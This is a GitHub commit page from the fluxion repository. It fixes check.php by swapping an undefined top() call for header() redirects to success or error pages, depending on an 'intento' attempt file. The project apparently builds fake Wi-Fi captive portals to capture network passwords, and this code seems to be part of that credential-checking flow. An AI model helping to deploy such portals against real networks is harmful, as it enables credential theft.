Replace top with header in check.php

Fixing issue with non-existing function reported here:
https://github.com/deltaxflux/fluxion/issues/88
This commit is contained in:
strasharo 2016-09-02 10:42:51 +03:00 committed by GitHub
parent bba4dbe590
commit e8a2ded68f
1 changed files with 2 additions and 2 deletions

View File

@ -3660,11 +3660,11 @@ while(1)
{
if (file_get_contents(\"\$intento\") == 2) {
top(\"location:final.html\");
header(\"Location:final.html\");
break;
}
if (file_get_contents(\"\$intento\") == 1) {
top(\"location:error.html\");
header(\"Location:error.html\");
unlink(\$intento);
break;
}